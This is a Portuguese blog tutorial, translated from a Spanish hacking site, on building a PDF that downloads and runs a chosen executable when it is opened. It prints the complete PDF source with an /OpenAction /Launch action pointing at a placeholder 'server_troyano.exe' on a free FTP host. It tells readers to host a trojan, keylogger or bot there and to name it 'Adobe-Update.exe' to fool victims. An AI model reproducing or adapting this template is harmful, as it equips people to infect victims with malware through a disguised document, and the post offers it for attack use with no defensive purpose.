18 de jan. de 2012

Executar *.exe ao abrir um PDF

http://www.techpaparazzi.com/wp-content/uploads/2011/03/Adobe-pdf-virus-np.jpg


Precisamos de...

  1. Nosso *.exe (trojan, keylogger, bot, joke, etc...)
  2. E um FTP.

Duas simples coisas. Bom, uma vez definido o *.exe, vamos fazer o upload em nosso FTP, pode ser qualquer um desde que o arquivo continue no formato de .exe ao ser baixado ex.: ftp.miftp/server_troyano.exe Também serve algum uploader que deixe o arquivo com a extenção e que seja direto sem nenhum tipo de capticha e sem tempo de espera, caso de sites como Megaupload, Rapidshare, FileSonic e etc.


Se não tem nenhum FTP faz uma busca neste site pode encontrar ai:

http://www.free-webhosts.com/webhosting-01.php.

Ou você também pode usar o anyhub* (o mesmo não foi testado por nós.) que oferece hospedagem de arquivo com link direto.


Vamos começar:

Bueno... ahora manos a la obra...

Abra o bloco de notas (notepad.exe)

Copie o código abaixo:

%PDF-1.1

1 0 obj

<<

/Type /Catalog

/Outlines 2 0 R

/Pages 3 0 R

/OpenAction 8 0 R

>>

endobj

2 0 obj

<<

/Type /Outlines

/Count 0

>>

endobj

3 0 obj

<<

/Type /Pages

/Kids [4 0 R]

/Count 1

>>

endobj

4 0 obj

<<

/Type /Page

/Parent 3 0 R

/MediaBox [0 0 612 792]

/Contents 5 0 R

/Resources

<< /ProcSet 6 0 R

/Font << /F1 7 0 R >>

>>

>>

endobj

5 0 obj

<< /Length 46 >>

stream

BT

/F1 24 Tf

100 700 Td

(Hacking[Blackploit]--> Blackploit.blogspot.com)Tj

ET

endstream

endobj

6 0 obj

[/PDF /Text]

endobj

7 0 obj

<<

/Type /Font

/Subtype /Type1

/Name /F1

/BaseFont /Helvetica

/Encoding /MacRomanEncoding

>>

endobj

8 0 obj

<<

/Type /Action

/S /Launch

/Win

<<

/F (http://www.FTP-gratuito.com/server_troyano.exe)

>>

>>

endobj

xref

0 9

0000000000 65535 f

0000000012 00000 n

0000000109 00000 n

0000000165 00000 n

0000000234 00000 n

0000000401 00000 n

0000000505 00000 n

0000000662 00000 n

trailer

<<

/Size 9

/Root 1 0 R

>>

startxref

751

%%EOF


As únicas linhas que você tem que modificar são:

/F (http://www.FTP-gratuito.com/server_troyano.exe)

Nesta linha http://www.FTP-gratuito.com/server_troyano.exe voce põe o link do seu *.exe anteriormente upado.

Se quiser também pode modificar isso:

(Hacking[Blackploit]--> Blackploit.blogspot.com)Tj

Em Hacking[Blackploit]--> Blackploit.blogspot.com

Este é o teto que aparecerá quando o PDF for aberto
Feito isso salve o arquivo com o nome que desejar ex.: nome.pdf é importante que seja salvo no formato .PDF


Resultado:

Quando abrir o arquivo pdf aparecerá uma mensagem de atualização do Adobe em que pedirá pra baixar seu arquivo.

Recomendação: que seu *.exe se chame Adobe-Update.exe.


Ao clicar abrir o *.exe será baixado e executado!

Para mais informações baixe o vídeo:
ExploitPdf.avi
Aqui o exemplo do arquivo feito:
Exploit.pdf

Fonte:
http://indetectables.net/

Créditos: http://www.blackploit.com

Traduzido por: Lucas CTD

Blog: www.catedraticoblog.com

Email/MSN: lucanerazzurro@live.it


voce pode baixar este tutorial clicando aqui!

0 comentários:

Postar um comentário

Informamos que...

Todos os arquivos disponiveis para download encontrados no
blog vêem de links hospedados na própria internet sem nenhum vinculo com nosso blog.

Links que estão com as tags "Hacker,Trojans e/ou Crypters" estão sujeitos a infecções por pessoas mal intencionadas ( Já que os mesmos não são upados por nós ou são apenas re-upados sem nenhum acréscimo de conteúdo.).


Obrigado pela atenção!

catedratico@catedraticoblog.com
lucas@catedraticoblog.com


Compartilhe

Twitter Delicious Facebook Digg Stumbleupon Favorites More